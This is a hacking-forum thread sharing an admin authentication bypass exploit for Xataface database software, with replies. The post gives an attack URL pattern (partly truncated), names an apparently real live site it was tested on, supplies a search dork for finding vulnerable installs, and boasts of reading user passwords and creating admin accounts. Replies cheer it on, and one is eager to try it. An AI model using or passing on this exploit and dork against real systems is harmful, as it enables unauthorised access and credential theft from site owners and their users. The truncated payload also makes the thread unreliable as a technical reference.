[Private] Exploit! Xataface Admin auth bypass vulnerability!
Xataface Admin Auth Bypass Vulnerability
#[+] Discovered by : Xinapse
#[+] Site : firewire-security.com
#[+] Email :
#[+] Vulnerability : Admin/database auth bypass vulnerability
#[+] Software : Xataface - open source GPL, PHP, MySQL database software
#[+] Vendor :
#[+] Usage :
http://www.site.com/admin.php?-action=v ... -mode=list
#[+] Tested on :
http://www.journeytherapeut.com/admin.p ... -mode=list
#[+] Alert : Most of the sites I tried running this software are vulnerable, only a few used .htaccess
#[+] Dork : "powered by dataface" "powered by xataface"
#[+] Description : With this I could edit/delete/create records in the database, create new admin accounts and view all the users and passwords.
#[+] Greetz : firewire-security team, b10h4z4rd, g3org3
Nice release! I tried testing it but got no luck XD
Lol, it's definitely not private anymore, it's all over the web
And Inj3ct0r.com is claiming it as their own
What the FUCK, who owns fucking inj3ct0r.com (and it's all over the web) as I submitted to packetstorm, milw0rm, exploit-db and security focus
lol I wouldn't call it "Private" if you submitted it everywhere... just saying :)
was private when it was uploaded,
nice share Xinapse! thanks
Thanks :P yeah I was pleased with myself
Desert Fox ™
Nice share, I can't wait to try it!